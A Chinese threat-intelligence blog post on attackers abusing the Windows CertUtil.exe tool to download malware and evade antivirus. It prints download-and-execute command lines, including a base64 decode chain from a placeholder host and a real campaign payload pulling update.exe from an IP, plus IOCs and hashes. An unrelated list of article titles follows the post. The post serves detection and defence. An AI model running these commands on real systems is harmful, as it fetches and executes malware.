1、前言

经过国外文章信息,CertUtil.exe下载恶意软件的样本。

2、实现原理

Windows有一个名为CertUtil的内置程序,可用于在Windows中管理证书。使用此程序可以在Windows中安装,备份,删除,管理和执行与证书和证书存储相关的各种功能。

CertUtil的一个特性是能够从远程URL下载证书或任何其他文件。

使用语法 :


"certutil.exe -urlcache -split -f [URL] output.file"

Casey Smith(https://twitter.com/subTee) 在2017年就已经公布的相关利用方法。


certutil -urlcache -split -f [serverURL] file.blahregsvr32.exe /s /u /I:file.blah scrub.dll

3、实际例子

目前在威胁情报平台里已经可以搜索到利用这种手法的相关病毒样本,样本中利用的方法:

4、混淆方式

  • 使用CertUtil + Base64来绕过安全软件

通过Base64对恶意文件进行编码,使恶意代码样本看起来像是无害的文本文件,然后使用CertUtil.exe下载后对其进行解码。下载了文本文件使用“Certutil.exe -decode”命令将Base64编码文件解码为可执行文件。


C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txtC:\Temp>certutil.exe -decode bad.txt bad.exe

在F5 Labs上有一篇利用漏洞的文章中提到了利用certutil下载文件的方式攻击Web服务器。Payload部分内容如下:

一旦文件下载并使用certutil进行 base64解码,它将被保存为update.exe并执行。

certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64&certutil -decode update.b64 update.exe&update.exe

5、样本HASH与分析结果

  • 分析平台分析结果:

https://www.hybrid-analysis.com/sample/87cf118bff58c38bc0d54c1d3fcc553e381df838437a99a2006dd8f726406c16?environmentId=100https://www.virustotal.com/en/file/1a3cd50fcc7a454025a641ffcc941353b4a7998c36066b399c72cb8cbff61071/analysis/1522278762/https://www.hybrid-analysis.com/sample/4faf0c88f41121038709e9a9d134736dfadf6e1f1f4fdb6812fc69818a9e8572?environmentId=100https://www.hybrid-analysis.com/sample/3bdecb8b3aaad6822a15011e5c9f10663c3ead64a61350148518b32f176ba02c?environmentId=100

  • IOC(Indicators of Compromise)

    • IP:
45[.]77[.]55[.]231
181[.]214[.]87[.]240
181[.]214[.]87[.]241
148[.]251[.]133[.]246
  • 文件名与HASH值:
update.b64: 66107b01bc93c8d4cf2e8a6a8faffb56
update.exe: 5bb5d3cb837d97174eddc681ca98aa80
msi64.zip: 8d8b8abe93aea52f9865f045a49912ae
SearchIndexer.exe: 1dd8ea5dd6975eb3d0dd14d71d1a404d
mssearch.exe: 47d3a5023d0cbe76a030bfac7bcfe2f2

6、参考

https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
https://f5.com/labs/articles/threat-intelligence/malware/old-dog-new-targets-switching-to-windows-to-mine-electroneum
https://www.bleepingcomputer.com/news/security/regsvr32-can-be-used-to-install-ransomware-through-jscript-installers/

转载于:https://www.cnblogs.com/17bdw/p/8728656.html

CertUtil.exe被利用来下载恶意软件相关推荐

  1. php 获取远程文件mine,使用CertUtil.exe下载远程文件

    使用CertUtil.exe下载远程文件 1.前言 经过国外文章信息,CertUtil.exe下载恶意软件的样本. 2.实现原理 Windows有一个名为CertUtil的内置程序,可用于在Windo ...

  2. 利用certutil.exe实现在批处理(bat)中嵌入可执行文件或者各种媒体、图片之类二进制文件的简单方法!...

    实际上利用certutil.exe 把二进制文件(包括各种文件,exe可执行程序,图片,声音,mp3) 经过base64编码为文本,可以实现把这些文件嵌入到批处理代码中. 有什么用?: 举个例子,批处 ...

  3. s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)

    Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21: 增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过 ...

  4. s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)-阿里云开发者社区...

    Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21: 增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过 ...

  5. cdb.exe的利用

    cdb.exe的利用 0x01 简介 cdb 是安装 windows debugging tools 时自带的一个命令行调试工具,由微软签发证书. 0x02 cdb.exe加载shellcode ​ ...

  6. 利用nvm下载nodejs

    利用nvm下载nodejs 在开发过程会一直遇到nodejs的版本问题,直接安装则只有一个版本,极其不方便 nvm则是用来管理nodejs的工具,可以通过nvm来安装切换不同版本的nodejs 安装前 ...

  7. Windows certutil.exe 命令 简单举例 计算MD5与SHA1/256

    Certutil 是 Windows 操作系统上预装的工具,是一个 CLI 程序,可用于转储和显示证书颁发机构(CA),配置信息,证书服务, CA 组件的备份和还原以及验证证书.密钥对和证书链, 校验 ...

  8. Anaconda:成功解决利用conda下载pytorch和torchvision时速度超慢的问题

    Anaconda:成功解决利用conda下载pytorch和torchvision时速度超慢的问题 目录 解决问题 解决思路 解决方法 解决问题 利用conda 下载pytorch和torchvisi ...

  9. vue 文件转换二进制_Vue利用Blob下载原生二进制数组文件

    本文实例为大家分享了Vue利用Blob下载原生二进制数组文件的具体代码,供大家参考,具体内容如下 在服务端推送过来的二进制数组(JSON格式),在前端要处理成JS原生数组以后才能做成Blob,有两个地 ...

最新文章

  1. 快起床刷题去,别人把你offer拿走啦
  2. BB84和B92协议
  3. Cannot find module 'express'
  4. putil:一个用于获得处理器和系统相关信息的模块
  5. CentOS发行版本介绍
  6. MegaCli常见命令
  7. python怎么读取excel-python怎么从excel中读取数据?
  8. java z+_Java算法练习—— Z 字形变换
  9. red-hat Linux6-5的安装
  10. Linux之unzip命令
  11. 安卓开发实现悬浮窗显示(全局显示),通过悬浮窗实时监控当前流量
  12. mongodb分组统计
  13. CADD课程学习(13)-- 研究蛋白小分子动态相互作用-II(水中的溶菌酶 GROMACS)
  14. choerodon-ui/pro入门 - dataset 的使用
  15. VS Code 的常用快捷键和插件(一)
  16. 完整的struts2框架应用实例
  17. Qwt开发教程(三)—Qwt常见类简介#F0222
  18. 中国智能行车记录仪行业发展现状及趋势分析,DMS将替代DVR
  19. 安卓 文本框怎么贴近边缘_flash怎么设置帧频-Adobe flash修改帧频的方法
  20. 群体智能优化算法之细菌觅食优化算法(Bacterial Foraging Optimization Algorithm,BFOA)

热门文章

  1. java中的常用日期类_Java中的常用日期类说明
  2. c语言程序中注释的格式化,格式化C语言命令indent
  3. java 插件开发 互相依赖_java – Eclipse插件开发:有没有办法控制有关我的插件缺少依赖项的安装程序消息?...
  4. 二维有限体积 matlab,二维有限体积法计算热传导及源码.pdf
  5. MongoDB 字符串值长度条件查询
  6. Linux 安装之U盘引导
  7. 下拉框_jQuery 美化界面的下拉框
  8. Jenkins入门指南
  9. 《YOLO算法笔记》(草稿)
  10. 计算机指令格式_计算机科学组织| 指令格式